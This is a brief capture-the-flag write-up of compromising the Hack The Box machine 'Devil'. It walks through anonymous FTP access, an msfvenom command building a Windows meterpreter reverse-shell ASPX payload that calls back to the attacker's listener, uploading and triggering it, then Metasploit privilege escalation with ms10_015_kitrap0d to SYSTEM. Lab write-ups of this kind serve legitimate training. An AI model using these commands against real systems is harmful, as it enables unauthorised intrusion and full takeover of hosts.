😃Devil HTB

Hello brothers, here I will explain how I hacked the Devil machine on the HTB platform. It only took me 10 minutes.

• First step: I scanned the machine with nmap and used the arg -sV to get the versions of open ports. Here are the results:

  

  • After the scan, I found 2 open ports, HTTP and FTP. ,, lets take a look for that

  

  it seems
• I attempted to check if I could log in as an anonymous user to the FTP server.

  

• I successfully logged in, and I discovered that every file here can be accessed from the site. Now, let's proceed to create our payload and access it from the browser to get a reverse shell. I used the following payload:

• i use this payload : msfvenom -p windows/meterpreter/reverse_tcp lhost=<listen_ip> lport=<lisetn_port> -f aspx -o reverse.aspx

• then we make alot of steps :

  • upload our shell to ftp server with command : put reverse.aspx

  • setup listner with msfconsole : use exploit/multi/handler and put our ip and port to recieve shell

  • Accessed the shell from the browser : <machine_ip/reverse.aspx>

• With these steps, I gained access to the Devil machine.

  
• Now, the next objective is to elevate privileges using my favorite module : run post/multi/recon/local_exploit_suggester

• It generated many results, and I tried a few, but none worked. Finally, I tried the following: use exploit/windows/local/ms10_015_kitrap0d and work success

  
• it worked successfully, granting me the privileges of NT AUTHORITY\SYSTEM.

  
• The next step is to find the flags using your preferred method.